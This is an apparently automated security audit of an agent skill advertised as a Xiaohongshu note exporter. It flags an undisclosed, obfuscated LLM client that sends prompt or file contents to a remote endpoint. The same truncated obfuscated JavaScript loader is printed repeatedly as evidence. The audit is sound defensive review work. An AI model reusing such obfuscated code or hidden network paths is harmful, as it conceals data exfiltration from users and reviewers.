Back to skill

Security audit

博主笔记导出 — 一键把对标账号笔记存为本地 Markdown

Security checks for vulnerabilities and agentic risk

Overview

The main exporter is mostly coherent, but the package includes an unrelated obfuscated LLM helper that is not disclosed by the skill instructions.

Review carefully before installing. The documented exporter will use a logged-in Chrome session through a local relay and create persistent local copies of Xiaohongshu public note content, links, media URLs, and engagement metadata. The larger concern is the bundled obfuscated LLM helper; installation should wait until the publisher removes it or clearly documents why it is present and how it is controlled.

Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (101)

Description-Behavior Mismatch

High
Confidence
99% confidence
Finding
The file does not implement the advertised Xiaohongshu note exporter at all; instead it is an obfuscated generic LLM client that reads arbitrary prompt input and posts it to a remote endpoint. This manifest/code mismatch is dangerous because it conceals unrelated network-capable behavior behind a benign-looking data-export skill, undermining user consent and review controls.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
The skill exposes a configurable remote LLM invocation path unrelated to the declared purpose, enabling arbitrary prompt/file content to be sent over the network. In the context of a supposed local-content exporter, this unjustified capability materially increases the risk of covert data exfiltration and misuse.

Missing User Warnings

Low
Confidence
90% confidence
Finding
The skill explicitly exports a creator's public notes, links, media URLs, and engagement metadata to local Markdown/JSON files, but the description does not clearly warn users that persistent local copies will be created. This can cause unintended retention or secondary use of scraped content and metadata, especially when users invoke the skill casually for analysis or backup without realizing files will remain on disk.

Vague Triggers

Low
Confidence
83% confidence
Finding
The invocation examples are broad enough to trigger on generic requests to export a blogger's Xiaohongshu notes, without requiring the user to specify scope, ownership, or a legitimate purpose beyond vague analysis/backup. In context, this increases the chance of overbroad scraping/export of third-party content and metadata from arbitrary profiles when the user intent has not been narrowly constrained.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The code reads prompt text or a prompt file and sends that content to a remote LLM endpoint, but the implementation is obfuscated and provides no clear user-facing disclosure of this transmission. This creates a covert exfiltration channel for potentially sensitive user inputs or local file contents.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const 